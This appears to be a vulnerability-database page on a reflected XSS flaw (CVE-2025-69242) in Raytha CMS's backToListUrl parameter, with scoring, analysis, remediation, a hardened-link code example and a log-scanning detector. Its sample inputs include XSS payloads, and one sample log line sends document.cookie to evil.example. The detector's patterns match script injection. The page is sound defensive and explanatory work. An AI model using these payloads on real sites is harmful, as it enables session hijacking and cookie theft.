
Raytha CVE-2025-69242

EUVD EUVD-2025-208711 · MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-03-16 · CERT-PL
5.1 · CVSS 4.0 · NVD

Severity by source

NVD PRIMARY
5.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Primary rating from NVD · only source for this CVE.

CVSS Vector (NVD)

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Attack Vector: Network
Attack Complexity: Low
Attack Requirements: None
Privileges Required: None
User Interaction: Active
Vulnerable System Impact (C/I/A): None / None / None
Subsequent System Impact (C/I/A): Low / Low / None

Lifecycle Timeline

Patch available: Apr 16, 2026 05:29 (EUVD) · version 1.4.6
EUVD ID assigned: Mar 16, 2026 12:00 (EUVD) · EUVD-2025-208711
Analysis generated: Mar 16, 2026 12:00 (vuln.today)
CVE published: Mar 16, 2026 11:54 (NVD) · MEDIUM 5.1

Description (CVE.org)

Raytha CMS is vulnerable to reflected XSS via the backToListUrl parameter. An attacker can craft a malicious URL which, when opened by an authenticated victim, results in arbitrary JavaScript execution in the victim's browser.

This issue was fixed in version 1.4.6.

Analysis (AI)

Raytha CMS reflects the backToListUrl query parameter into its response without adequate validation or encoding. An attacker who holds no account on the target (PR:N) can therefore craft a URL that, when opened by an authenticated Raytha user, executes attacker-controlled JavaScript in that user's browser. The script runs inside the victim's authenticated session, so it can perform CMS actions as that user, read anything the session can see and, where the session cookie is not HttpOnly, steal the cookie itself; if the victim is an administrator, the whole administrative interface is in scope. The CVSS 4.0 score of 5.1 (Medium) reflects the need for the victim to actively open the link (UI:A) and the fact that the scored impact lands on the subsequent system, the victim's browser session (SC:L/SI:L), rather than on the server itself (VC:N/VI:N/VA:N). In practice one phishing message to an administrator is sufficient, so for installations whose admin login is reachable from the internet the issue matters more than the score alone suggests. The vulnerability was fixed in version 1.4.6.

Technical Context (AI)

The issue is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation, Cross-site Scripting). As its name indicates, backToListUrl is a navigation parameter: it carries the URL of the listing the user came from so that a "back to list" link can return them there, typically with paging or filter state preserved. The advisory states only that the value is reflected without being neutralized; it does not publish the affected view. Such a parameter typically becomes executable in one of two ways: the raw value is written into the HTML or into an href attribute without encoding, so a value that closes the attribute and opens a new tag injects markup; or the value is accepted as a complete URL, so a javascript: URL executes when the link is followed even though it contains no HTML metacharacters at all. Output encoding closes only the first path; validation that the value is a same-origin relative path is needed to close the second. Raytha CMS is a .NET-based headless content management system (the related Functions-module issue CVE-2025-15540, listed below, concerns arbitrary .NET operations). Return-URL parameters of this kind are easy to miss in a security review because they look like internal plumbing rather than user input, yet they are fully attacker-controlled. Because the XSS is reflected, the payload must be delivered in a URL, so the realistic delivery mechanism is a phishing link, or a link planted somewhere an administrator will click it.
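The two failure paths described above, and the fix for each, as an added illustration. This is not Raytha's code (Raytha is a .NET application and the advisory does not publish the affected view); it is a generic JavaScript rendering of a "back to list" link, first as commonly mis-implemented and then hardened. The route path "/admin/contents" used as the fallback is a placeholder, not a Raytha route.

```javascript
// Added illustration, not Raytha's code: a "back to list" link built from a
// query parameter, first as commonly mis-implemented, then hardened.
// The fallback path "/admin/contents" is a placeholder.

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };

// HTML-encode a value for safe placement in element text or a quoted attribute.
function htmlEncode(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// VULNERABLE: the raw parameter is interpolated into the href attribute.
//  - "><img src=x onerror=alert(1)>  closes the attribute and injects a tag.
//  - javascript:alert(1)             contains no markup, yet runs on click.
function renderBackLinkVulnerable(backToListUrl) {
  return `<a href="${backToListUrl}">Back to list</a>`;
}

// Accept only a same-origin relative path: a single leading "/", not "//" or
// "/\" (both resolve to another host), no scheme, and no whitespace or control
// characters (browsers strip those, so "java\nscript:" would still execute).
function isLocalUrl(value) {
  if (typeof value !== "string" || value.length === 0) return false;
  if (/[\u0000-\u001F\u007F\s]/.test(value)) return false;
  if (!value.startsWith("/") || value.startsWith("//") || value.startsWith("/\\")) return false;
  // Belt and braces: resolve against a dummy origin and confirm it stays there.
  try {
    return new URL(value, "https://cms.invalid").origin === "https://cms.invalid";
  } catch {
    return false;
  }
}

// Fall back to a fixed listing URL when the supplied value is not local.
function safeBackToListUrl(value, fallback = "/admin/contents") {
  return isLocalUrl(value) ? value : fallback;
}

// HARDENED: validate first (closes the javascript: path), then encode
// (closes the attribute-breakout path). Both steps are needed.
function renderBackLinkHardened(backToListUrl) {
  return `<a href="${htmlEncode(safeBackToListUrl(backToListUrl))}">Back to list</a>`;
}

// Stand-alone demo: compare the two renderings for a few inputs.
if (typeof require !== "undefined" && require.main === module) {
  const samples = ["/admin/contents?page=2", "javascript:alert(1)", '"><img src=x onerror=alert(1)>', "//evil.example/"];
  for (const v of samples) {
    console.log(JSON.stringify(v));
    console.log("  vulnerable:", renderBackLinkVulnerable(v));
    console.log("  hardened:  ", renderBackLinkHardened(v));
  }
}
```

The order matters: encoding the value and then interpolating it still leaves javascript: URLs clickable, and validating without encoding still lets a quote character break out of the attribute in any view that skips the validation. In ASP.NET Core the equivalent of isLocalUrl is the framework's IUrlHelper.IsLocalUrl check, and Razor's attribute encoding supplies the second step.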

Remediation (AI)

Upgrade Raytha CMS to version 1.4.6 or later; that release fixes the backToListUrl reflection. Where upgrading has to wait, the compensating controls, in order of value, are: treat backToListUrl and every similar return-URL parameter (the related CVE-2025-69245 concerns returnUrl on the login page) as untrusted input, accepting only relative same-origin paths (in ASP.NET Core the IUrlHelper.IsLocalUrl check is the standard test) and falling back to a fixed listing URL otherwise, and HTML-encoding the value wherever it is rendered into an attribute; deploy a Content Security Policy on the administrative interface that forbids inline script, so an injected payload or javascript: URL cannot run even if it reaches the page; mark session cookies HttpOnly and SameSite so an injected script cannot read them. Restricting the admin interface to trusted networks does not by itself stop this attack, since the victim's own browser sends the crafted request from inside the trusted network, but it does stop the attacker from probing the endpoint and limits what a stolen session can be used for from outside. Multi-factor authentication likewise does not prevent the attack, because the script runs inside an already-authenticated session; it only reduces the value of any credentials the script manages to capture. For detection, search web-server or reverse-proxy access logs for requests whose backToListUrl value, after URL-decoding (including a second decode for double-encoded payloads), contains a "<" character, a javascript: scheme, an on*= event handler, or an absolute URL pointing at another origin; a legitimate value is a relative path within the CMS.
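The log review described above, as an added example that is not part of the advisory or of Raytha: a scanner over combined-format access-log lines that URL-decodes the backToListUrl parameter (bounded, so double encoding is unwrapped) and flags the indicators listed. The log lines, client addresses and /admin paths are constructed for the demonstration and do not reflect Raytha's real routes.

```javascript
// Added detection example, not from the advisory or from Raytha. Scans
// combined-format access-log lines for requests whose backToListUrl query
// parameter carries script-injection indicators. The log lines, client
// addresses and /admin paths below are constructed for the demonstration.

const SAMPLE_LOG = [
  // legitimate: relative path back to a paged listing
  '203.0.113.7 - - [16/Mar/2026:12:01:02 +0000] "GET /admin/contents/edit/42?backToListUrl=%2Fadmin%2Fcontents%3Fpage%3D2 HTTP/1.1" 200 5120',
  // javascript: URL, no HTML metacharacters at all
  '203.0.113.7 - - [16/Mar/2026:12:01:09 +0000] "GET /admin/contents/edit/42?backToListUrl=javascript%3Aalert(document.cookie) HTTP/1.1" 200 5130',
  // attribute breakout with an exfiltrating event handler
  '198.51.100.4 - - [16/Mar/2026:12:02:11 +0000] "GET /admin/contents/edit/42?backToListUrl=%22%3E%3Cimg%20src%3Dx%20onerror%3Dfetch(%27https%3A%2F%2Fevil.example%2F%27%2Bdocument.cookie)%3E HTTP/1.1" 200 5140',
  // same idea, double URL-encoded to slip past a single-decode filter
  '198.51.100.4 - - [16/Mar/2026:12:02:40 +0000] "GET /admin/contents/edit/42?backToListUrl=%2522%253E%253Csvg%2520onload%253Dalert(1)%253E HTTP/1.1" 200 5140',
  // off-site absolute URL: not XSS, but not a valid "back" target either
  '192.0.2.9 - - [16/Mar/2026:12:03:00 +0000] "GET /admin/contents/edit/42?backToListUrl=https%3A%2F%2Fevil.example%2Flogin HTTP/1.1" 200 5140',
  // unrelated request without the parameter
  '192.0.2.9 - - [16/Mar/2026:12:03:30 +0000] "POST /admin/login HTTP/1.1" 302 0',
];

const REQUEST_RE = /"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/;

// Indicators are matched against the fully decoded value with control
// characters removed, so "java\tscript:" and %25-encoded payloads are caught.
const INDICATORS = [
  { name: "html-tag",          re: /<\s*[a-z!\/]/i },
  { name: "event-handler",     re: /\bon[a-z]+\s*=/i },
  { name: "javascript-scheme", re: /javascript\s*:/i },
  { name: "data-html",         re: /data\s*:\s*text\/html/i },
  { name: "external-origin",   re: /^(?:[a-z][a-z0-9+.\-]*:)?\/\//i },
];

// Percent-decode repeatedly (bounded) until the value stops changing.
function fullyDecode(value, maxRounds = 3) {
  let current = value.replace(/\+/g, " ");
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(current); } catch { break; } // malformed %xx: stop
    if (next === current) break;
    current = next;
  }
  return current;
}

// Return the raw (still encoded) backToListUrl value, or null if absent.
function extractBackToListUrl(line) {
  const m = REQUEST_RE.exec(line);
  if (!m) return null;
  const q = m[1].indexOf("?");
  if (q === -1) return null;
  for (const pair of m[1].slice(q + 1).split("&")) {
    const eq = pair.indexOf("=");
    const key = eq === -1 ? pair : pair.slice(0, eq);
    if (key === "backToListUrl") return eq === -1 ? "" : pair.slice(eq + 1);
  }
  return null;
}

// Scan lines; one finding per request whose parameter matches any indicator.
function scanLogLines(lines) {
  const findings = [];
  for (const line of lines) {
    const raw = extractBackToListUrl(line);
    if (raw === null) continue;
    const decoded = fullyDecode(raw).replace(/[\u0000-\u001F\u007F]/g, "");
    const indicators = INDICATORS.filter((ind) => ind.re.test(decoded)).map((ind) => ind.name);
    if (indicators.length > 0) {
      findings.push({ client: line.split(" ")[0], value: decoded, indicators });
    }
  }
  return findings;
}

if (typeof require !== "undefined" && require.main === module) {
  for (const f of scanLogLines(SAMPLE_LOG)) {
    console.log(`${f.client}  [${f.indicators.join(", ")}]  ${f.value}`);
  }
}
```

Run over the sample, the scanner reports four of the six lines: the javascript: URL, both breakout payloads (the double-encoded one only because decoding is repeated), and the off-site absolute URL; the legitimate relative path and the request without the parameter are silent. The external-origin indicator is worth keeping even though it is not XSS: a back link that leaves the site is never a legitimate value for this parameter, and it is what an attacker testing the reflection will often try first.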

More in Raytha

CVE-2026-12076 · CRITICAL 9.3 · Jun 30
SQL injection in Raytha CMS 1.5.2 lets a remote, unauthenticated attacker inject arbitrary SQL through the OData filter

CVE-2025-15540 · HIGH 8.8 · Mar 16
A code injection vulnerability in Raytha CMS's Functions module allows privileged users to execute arbitrary .NET operat

CVE-2025-69240 · HIGH 7.5 · Mar 16
A host header injection vulnerability in Raytha CMS allows attackers to hijack password reset tokens by spoofing X-Forwa

CVE-2025-69243 · MEDIUM 6.9 · Mar 16
Raytha CMS contains a user enumeration vulnerability in its password reset functionality where differing error messages

CVE-2025-69246 · MEDIUM 6.9 · Mar 16
Raytha CMS lacks brute force protection mechanisms, allowing attackers to conduct unlimited automated login attempts wit

CVE-2025-69238 · MEDIUM 6.9 · Mar 16
Raytha CMS contains a Cross-Site Request Forgery (CSRF) vulnerability across multiple endpoints that fails to enforce to

CVE-2025-69241 · MEDIUM 5.3 · Mar 16
Raytha CMS contains a Stored Cross-Site Scripting (XSS) vulnerability in the profile editing functionality, specifically

CVE-2025-69245 · MEDIUM 5.1 · Mar 16
Raytha CMS contains a Reflected Cross-Site Scripting (XSS) vulnerability in the logon functionality's returnUrl paramete

CVE-2025-69237 · MEDIUM 5.1 · Mar 16
Raytha CMS contains a Stored Cross-Site Scripting (XSS) vulnerability in the page creation functionality through the Fie

CVE-2025-69236 · MEDIUM 5.1 · Mar 16
Raytha CMS contains a Stored Cross-Site Scripting (XSS) vulnerability in the post editing functionality, specifically wi

CVE-2025-69239 · MEDIUM 5.1 · Mar 16
Raytha CMS contains a Server-Side Request Forgery (SSRF) vulnerability in its Theme Import from URL feature that allows


CVE-2025-69242 vulnerability details – vuln.today
